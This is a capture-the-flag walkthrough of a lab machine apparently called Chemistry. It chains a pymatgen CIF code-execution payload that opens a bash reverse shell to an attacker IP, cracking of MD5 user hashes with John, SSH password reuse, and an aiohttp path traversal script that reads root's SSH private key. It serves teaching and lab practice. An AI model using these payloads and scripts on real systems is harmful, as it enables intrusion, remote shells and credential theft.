Recon

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_  256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Sun, 20 Oct 2024 08:04:45 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Chemistry - Home</title>
|     <link rel="stylesheet" href="/static/styles.css">
|     </head>
|     <body>
|     <div class="container">
|     class="title">Chemistry CIF Analyzer</h1>
|     <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
|     <div class="buttons">
|     <center><a href="/login" class="btn">Login</a>
|     href="/register" class="btn">Register</a></center>
|     </div>
|     </div>
|     </body>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>

Werkzeug Web Server (Port 5000):

  • The Python-based web server suggests a custom or lightweight web application, in this case, a "Chemistry CIF Analyzer."
  • The most promising attack vector is the file upload feature, specifically how the server parses uploaded CIF files.
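The Server banner is the most useful string in this scan, since it names both the framework and the interpreter. As a small illustration, the sketch below splits such a banner into product and version pairs. The helper name parse_server_banner is hypothetical and not part of any tool used in this writeup.

```python
def parse_server_banner(banner: str) -> dict[str, str]:
    """Split a banner such as 'Werkzeug/3.0.3 Python/3.9.5' into {product: version}."""
    products = {}
    for token in banner.split():
        name, sep, version = token.partition("/")
        if sep:  # skip tokens that carry no version part
            products[name] = version
    return products


print(parse_server_banner("Werkzeug/3.0.3 Python/3.9.5"))
```

The resulting versions can then be compared against advisories for each component.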

Port 5000 | CIF

A CIF (Crystallographic Information File) is a standard text file format used in crystallography to store and exchange crystallographic data. This format organizes information primarily about crystal structures such as atomic coordinates, cell dimensions, symmetry operations, and other details related to the material's three-dimensional atomic arrangement.

  • Structure: CIF files are plain text and can be read easily by both humans and machines. The format is tag-based: each data item is identified by a unique tag that starts with an underscore, loosely comparable to keys in XML or JSON.
  • Data Types: They can include a wide range of data, from chemical composition and crystal symmetry to detailed atomic coordinates and temperature factors.
  • Extensibility: The format is extensible, allowing for the inclusion of new data items as crystallography evolves.
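To make the tag-based layout concrete, here is a minimal sketch of a reader for the simplest CIF constructs. It is an assumption-laden toy: parse_simple_cif is a hypothetical helper that only understands single-line tag/value pairs and one loop_ block with one row per line, which is far less than the real CIF grammar.

```python
import shlex

SAMPLE = """\
data_Example
_cell_length_a    10.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 H 0.00000
 O 0.50000
"""


def parse_simple_cif(text: str):
    """Return (items, rows): plain tag/value pairs and the rows of a single loop_."""
    items = {}       # tag -> value for "tag value" lines
    loop_tags = []   # column tags declared after loop_
    loop_rows = []   # one dict per data row of the loop
    in_loop = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("data_"):
            continue
        if line == "loop_":
            in_loop, loop_tags = True, []
            continue
        tokens = shlex.split(line)  # honours quoted values such as 'P 1'
        if tokens[0].startswith("_"):
            if in_loop and len(tokens) == 1:
                loop_tags.append(tokens[0])      # loop column header
            else:
                in_loop = False                  # a tag with a value ends the loop
                items[tokens[0]] = tokens[1] if len(tokens) > 1 else ""
        elif in_loop:
            loop_rows.append(dict(zip(loop_tags, tokens)))
    return items, loop_rows


items, rows = parse_simple_cif(SAMPLE)
print(items)
print(rows)
```

Because unknown tags are simply stored rather than rejected, the sketch also shows why the format is easy to extend with extra data items.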

The process might seem a bit intricate, but let's perform a test first. Head over to the Crystallography Open Database and select a CIF file for download. Once we've got the file, create a new account on the server, then upload it. This will allow us to test how the server handles CIF uploads, potentially revealing critical insights into its processing flow:

Upon uploading the CIF file, the server returns a 404 error, but interestingly, it reveals the path /structure for handling uploaded files:

Additionally, the website offers a sample CIF file at address http://chemistry.htb:5000/static/example.cif:

data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy
 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

Which can be successfully parsed by the server:

The web server itself is running Werkzeug 3.0.3 on Python 3.9.5. Python 3.9.5 is an old patch release, which hints that other dependencies on the box may be outdated as well. That makes the way the server parses and handles CIF files a natural attack surface to explore further.

Deserialization | Web

CVE-2024-23346

Based on the information gathered during reconnaissance, we know that the server parses CIF data under the /structure path and runs an old Python release (3.9.5), which may come with outdated and vulnerable libraries.

When we uploaded the example CIF to the server and it was parsed successfully, we could observe the following:

  • The lattice parameters and atomic site data (positions of atoms in above crystal structure) resemble the kind of structured output that pymatgen could generate from a CIF file. If the file upload parses these parameters from a CIF file and presents them in this format, it suggests that a crystallographic library like pymatgen is being used.
  • pymatgen would extract lattice parameters (a, b, c, α, β, γ), atomic coordinates (x, y, z), and chemical formula (H1 O1), just as shown in the response.
  • The response lists the atomic sites (positions x, y, z) for the atoms labeled H and O. This is exactly the kind of output that pymatgen produces after parsing a CIF file: it extracts these details and makes them easy to present in a web application.

The web server is running Werkzeug 3.0.3 on Python 3.9.5, which is a suitable setup for leveraging pymatgen, a powerful Python library for parsing CIF files. However, the outdated server configuration might introduce some potential risks.

Specifically, CVE-2024-23346 could be relevant here. It affects the pymatgen library itself rather than the web server: parsing a maliciously crafted CIF file can lead to arbitrary code execution. This gives us a strategic opportunity to investigate further and potentially exploit weaknesses in the server's parsing mechanism. This article introduces Arbitrary Code Execution in Pymatgen via Insecure Deserialization.

Pymatgen

The CIF (Crystallographic Information File) format is highly relevant when working with pymatgen (Python Materials Genomics), a robust library in Python used for materials analysis.

Integration of CIF files with pymatgen:

  1. Structure Loading and Manipulation: pymatgen can read CIF files to load crystallographic structures into Python objects. It allows researchers and developers to manipulate these structures programmatically.
  2. Materials Property Calculation: Once the structure is loaded from a CIF file, pymatgen can be used to calculate a wide range of materials properties, such as electronic band structure, density of states, and dynamic stability.
  3. Materials Analysis: pymatgen includes modules for analyzing crystal symmetry, exploring phase diagrams, and generating Pourbaix diagrams.
  4. Visualization: Through integration with visualization libraries, pymatgen can be used to generate visual representations of the structures loaded from CIF files. This helps build a more intuitive understanding of complex crystal structures.
  5. Automation in Materials Discovery: pymatgen plays a crucial role in high-throughput materials discovery workflows. It can automate the generation of inputs for simulations, manage computational jobs, and analyze outputs.

To better understand how the server operates, let's look at an example of how it might use the pymatgen library:

from pymatgen.io.cif import CifParser
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer

# Load a CIF file and take the first structure it contains
parser = CifParser("<path>/<CIF>")
structure = parser.get_structures()[0]

# Print the structure summary
print(structure)

# Calculate and print the space group
space_group_analyzer = SpacegroupAnalyzer(structure)
print("Space group:", space_group_analyzer.get_space_group_symbol())

A script like this loads a crystal structure from a CIF file, extracts key details, and identifies its space group using pymatgen's built-in functionality, which is presumably close to what the server does.

To reproduce the issue locally, we install a vulnerable pymatgen release (2024.2.8 or earlier), which matches the proof of concept (PoC) and lets us explore the weakness before touching the target.

To test the Python script with real-world data, we can replace the file path and CIF file name to reflect the actual file we downloaded from the web app:

It extracts and displays the crystal structure details, allowing us to validate the behavior of the server when it parses the CIF file.
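Before relying on the local test environment, it is worth confirming that the installed pymatgen release really falls in the affected range. The sketch below is a plain version comparison. It assumes purely numeric calendar versions and takes 2024.2.20 as the first fixed release, which should be verified against the advisory. The names version_tuple and is_affected are hypothetical.

```python
def version_tuple(version: str) -> tuple[int, ...]:
    """Turn '2024.2.8' into (2024, 2, 8); assumes purely numeric parts."""
    return tuple(int(part) for part in version.split("."))


# Assumption: first release containing the fix, as listed in the advisory.
FIRST_FIXED = version_tuple("2024.2.20")


def is_affected(installed: str) -> bool:
    """True when the installed release predates the assumed fixed release."""
    return version_tuple(installed) < FIRST_FIXED


for candidate in ("2023.12.18", "2024.2.8", "2024.2.20"):
    print(candidate, is_affected(candidate))
```

In a real environment the installed version string could be obtained with importlib.metadata.version("pymatgen") instead of being typed in by hand.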

Exploit

Original POC from the CVE:

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in
().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" +
"classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch
pwned");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
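The PoC works because, according to the advisory, the transformation string ends up in Python's eval(). The sketch below is a simplified stand-in for that pattern, not pymatgen's actual source: eval_term_unsafe and looks_like_plain_term are hypothetical names, and the probe is deliberately harmless. It shows that removing the builtins does not help, because attribute access on a literal still reaches every loaded class.

```python
import re


def eval_term_unsafe(term: str):
    """Evaluate one transformation term the risky way (illustration only)."""
    # Builtins are removed, yet attribute access on literals still works.
    return eval(term, {"__builtins__": None}, {"a": 1.0, "b": 1.0, "c": 1.0})


# A normal transformation term behaves as expected.
print(eval_term_unsafe("a + b/2"))

# Harmless probe: from an empty tuple we reach `object` and count its
# subclasses, without using a single builtin name.
benign_probe = "().__class__.__mro__[1].__subclasses__().__len__()"
print(eval_term_unsafe(benign_probe) > 0)

# One possible mitigation (an assumption, not the upstream fix):
# accept only characters a plain arithmetic term can contain.
_ALLOWED = re.compile(r"[abc0-9+\-*/. ]+")


def looks_like_plain_term(term: str) -> bool:
    return _ALLOWED.fullmatch(term) is not None


print(looks_like_plain_term("a + b/2"), looks_like_plain_term(benign_probe))
```

The real payload follows the same route as the probe, but picks the BuiltinImporter class from the subclass list to load os and run a command.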

Our target server will return a 404 error, similar to what we observed when uploading a random CIF file earlier. This happens because the data structure is NOT recognized by the pymatgen library on the backend.

To bypass this, we need to provide a valid Crystallographic data structure and embed our malicious deserialization payload within it. Since the Crystallographic data structure is extensible, we can modify the example.cif file to include a reverse shell payload:

# example.cif
data_Example
_cell_length_a    10.00000
_cell_length_b    10.00000
_cell_length_c    10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta  90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
 _atom_site_label
 _atom_site_fract_x
 _atom_site_fract_y
 _atom_site_fract_z
 _atom_site_occupancy


 H 0.00000 0.00000 0.00000 1
 O 0.50000 0.50000 0.50000 1

# payload
_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.▒▒.▒▒/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

The server no longer returns 404, but 500 (Internal Server Error). With a listener set up in advance, we catch a reverse shell as the app account.

Crack Hash | Rosa

Our next target will be user rosa:

The web root often reveals sensitive information, such as configuration or database files. In this case, under the path /home/app/instance/, we find a database.db file:

After downloading the file to our attack machine and dumping it, we have the hashes for all registered users.
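Dumping the database does not need any special tooling, since Python's sqlite3 module can read it directly. The sketch below is a minimal example under loud assumptions: the table name user and the columns username and password are guesses for illustration, and an in-memory database stands in for database.db so the snippet runs anywhere.

```python
import sqlite3


def dump_users(conn: sqlite3.Connection, table: str = "user"):
    """Return (username, password_hash) rows; table and column names are assumed."""
    cursor = conn.execute(f'SELECT username, password FROM "{table}"')
    return cursor.fetchall()


# Stand-in for sqlite3.connect("database.db").
conn = sqlite3.connect(":memory:")
conn.execute('CREATE TABLE "user" (id INTEGER PRIMARY KEY, username TEXT, password TEXT)')
conn.execute('INSERT INTO "user" (username, password) VALUES (?, ?)', ("demo", "0" * 32))

# Print in the user:hash layout that password crackers expect.
for username, password_hash in dump_users(conn):
    print(f"{username}:{password_hash}")
```

If the real schema differs, querying the sqlite_master table lists the actual table names.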

The 32-character hexadecimal format suggests that these are MD5 hashes.
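A quick shape check makes that guess explicit. The sketch below only tests for 32 hexadecimal characters, which is consistent with MD5 but not proof, since other 128-bit digests look the same. The helper looks_like_md5 is a hypothetical name.

```python
import hashlib
import re

MD5_HEX = re.compile(r"[0-9a-fA-F]{32}")


def looks_like_md5(value: str) -> bool:
    """True when the value has the length and alphabet of a hex MD5 digest."""
    return MD5_HEX.fullmatch(value) is not None


sample = hashlib.md5(b"example").hexdigest()
print(len(sample), looks_like_md5(sample))
```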

We can use John to crack them easily. Save the hashes into a TXT file:

admin:2861debaf8d99436a10e▒▒▒▒▒▒▒▒▒▒▒▒
app:197865e46b878d9e74a0▒▒▒▒▒▒▒▒▒▒▒▒
rosa:63ed86ee9f624c7b14f1▒▒▒▒▒▒▒▒▒▒▒▒
robert:02fcf7cfc10adc37959▒▒▒▒▒▒▒▒▒▒▒▒
jobert:3dec299e06f7ed187b▒▒▒▒▒▒▒▒▒▒▒▒
carlos:9ad48828b0955513f7▒▒▒▒▒▒▒▒▒▒▒▒
peter:6845c17d298d95aa942▒▒▒▒▒▒▒▒▒▒▒▒
victoria:c3601ad2286a4293868▒▒▒▒▒▒▒▒▒▒▒▒
tania:a4aa55e816205dc0389591▒▒▒▒▒▒▒▒▒▒▒▒
eusebio:6cad48078d0241cca9a7b3▒▒▒▒▒▒▒▒▒▒▒▒
gelacia:4af70c80b68267012ecd▒▒▒▒▒▒▒▒▒▒▒▒
fabian:4e5d71f53fdd2eabdba▒▒▒▒▒▒▒▒▒▒▒▒
axel:9347f9724ca083b17e395▒▒▒▒▒▒▒▒▒▒▒▒
kristel:6896ba7b11a62cacf▒▒▒▒▒▒▒▒▒▒▒▒

Then run John:

john hashes.txt --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
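What John does in wordlist mode can be sketched in a few lines: hash every candidate word and compare it with the stored digests. The version below is an illustration only, with a hypothetical crack_md5 helper and a made-up demo entry. It assumes unsalted raw MD5, and it is far slower than John on a list the size of rockyou.txt.

```python
import hashlib


def crack_md5(targets: dict[str, str], candidates) -> dict[str, str]:
    """Map each user to the candidate word whose MD5 matches the stored hash."""
    # Note: users sharing the same hash would collapse to one entry here.
    by_hash = {digest.lower(): user for user, digest in targets.items()}
    found = {}
    for word in candidates:
        digest = hashlib.md5(word.encode("utf-8", "ignore")).hexdigest()
        user = by_hash.get(digest)
        if user is not None:
            found[user] = word
    return found


# Made-up demo data, not taken from the target database.
demo_targets = {"demo": hashlib.md5(b"letmein").hexdigest()}
print(crack_md5(demo_targets, ["123456", "letmein", "qwerty"]))
```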

After running the hashes through John, we've successfully cracked the plain-text password for our target user rosa:

Reusing the password for SSH login, we compromise the rosa account and take the user flag:

Aiohttp | Root

Enumerating the machine with LinPEAS, we first take a look at the current processes:

And netstat ports:
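When netstat is not available on a box, the same information can be read from /proc/net/tcp. The sketch below parses that format and keeps only sockets listening on 127.0.0.1. The sample text is fabricated for illustration (inode and uid values are made up), and loopback_listeners is a hypothetical helper.

```python
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1
   1: 00000000:1388 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 12346 1
"""


def loopback_listeners(proc_net_tcp: str) -> list[int]:
    """Return ports in LISTEN state that are bound to 127.0.0.1 only."""
    ports = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        addr_hex, port_hex = fields[1].split(":")
        # State 0A is LISTEN; 0100007F is 127.0.0.1 in little-endian hex.
        if fields[3] == "0A" and addr_hex == "0100007F":
            ports.append(int(port_hex, 16))
    return sorted(ports)


print(loopback_listeners(SAMPLE_PROC_NET_TCP))
```

Services bound only to the loopback address are exactly the ones an external scan misses, which is why they deserve a closer look after gaining a shell.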

The next target is straightforward: there is a suspicious service listening on port 8080. Set up port forwarding and check the service.

ssh -L 1337:127.0.0.1:8080 [email protected]

Once tunneled, visit the port in our browser to find a monitoring service:

Observe the network traffic in BurpSuite:

The response header Server: Python/3.9 aiohttp/3.9.1 indicates that the service is built with aiohttp, a Python asynchronous framework commonly used for building web applications and APIs.

aiohttp is a popular asynchronous HTTP client-server framework in Python that is designed to handle asynchronous requests efficiently, making it suitable for building scalable web applications, APIs, and services that require high concurrency. It is often used to create non-blocking, event-driven applications where tasks such as network communication, database queries, or file operations can be handled concurrently without waiting for each task to finish before starting the next.

As with the pymatgen exploit, this service runs an outdated Python library: aiohttp 3.9.1 is affected by CVE-2024-23334, and a PoC is available on GitHub.

CVE-2024-23334 is a directory traversal vulnerability in versions of the aiohttp library up to 3.9.1. The vulnerability occurs when aiohttp is used to serve static files, and the follow_symlinks option is set to True. This configuration allows attackers to bypass the static root directory and access arbitrary files on the server's filesystem, potentially exposing sensitive information.
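The underlying mistake is a missing containment check after the requested path has been joined to the static root. The sketch below models that idea with plain path arithmetic. It is not aiohttp's code: the root /opt/app/static and both helper names are hypothetical.

```python
import posixpath


def resolve_unchecked(root: str, requested: str) -> str:
    """Join and normalise without verifying the result stays under root."""
    return posixpath.normpath(posixpath.join(root, requested))


def resolve_checked(root: str, requested: str) -> str:
    """Same resolution, but refuse anything that escapes the static root."""
    root = posixpath.normpath(root)
    candidate = resolve_unchecked(root, requested)
    if posixpath.commonpath([root, candidate]) != root:
        raise PermissionError(f"{requested!r} escapes {root!r}")
    return candidate


print(resolve_unchecked("/opt/app/static", "../../../etc/passwd"))
print(resolve_checked("/opt/app/static", "css/site.css"))
```

With the check in place, the traversal request is rejected before any file is opened, while ordinary static files resolve as before.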

The PoC on GitHub is built as a demonstration with its own server, but we don't need to set that up on our attack machine because the target already runs the vulnerable service. Let's take a look at the exploit.sh script:

#!/bin/bash

url="http://localhost:8081"
string="../"
payload="/static/"
file="etc/passwd" # without the first /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

  • payload="/static/": This is the starting point for the payload, indicating the script begins the traversal at the /static/ directory, which is often used to serve static content.
  • file="etc/passwd": This is the target file to leak.
  • The loop attempts up to 15 levels of directory traversal (adding ../ to the payload each time) to move up in the file structure from the /static/ directory.
  • curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file": This command makes an HTTP request to the server with curl. The --path-as-is option tells curl to send the path exactly as given instead of collapsing the ../ sequences before the request is sent, so the traversal actually reaches the server.
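The loop logic can also be sketched in Python to make the generated paths easy to inspect. The generator below only builds the candidate URLs and sends nothing. traversal_urls is a hypothetical helper, and the base URL and prefix are the values from the script above.

```python
def traversal_urls(base_url: str, static_prefix: str, target: str, max_depth: int = 15):
    """Yield one candidate URL per traversal depth, shallowest first."""
    payload = static_prefix
    for _ in range(max_depth):
        payload += "../"
        yield f"{base_url}{payload}{target}"


for url in traversal_urls("http://localhost:8081", "/static/", "etc/passwd", max_depth=3):
    print(url)
```

Any client used to send these URLs must leave the ../ segments untouched, which is the role --path-as-is plays for curl.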

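In our attack scenario, the service listens on port 8080, and a worthwhile target file is /root/.ssh/id_rsa. The static directory /assets was revealed through network traffic analysis. Now, we can proceed by modifying the exploit.sh script. The URL below assumes the script runs on the target itself; through the SSH tunnel set up earlier, it would be http://localhost:1337 instead: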

#!/bin/bash

url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa"  # without the leading /

for ((i=0; i<15; i++)); do
    payload+="$string"
    echo "[+] Testing with $payload$file"
    status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
    echo -e "\tStatus code --> $status_code"
    
    if [[ $status_code -eq 200 ]]; then
        echo "[+] File found, downloading contents..."
        curl -s --path-as-is "$url$payload$file"
        break
    fi
done

Bingo:

Use the private key to log in over SSH as the root user:

Rooted.

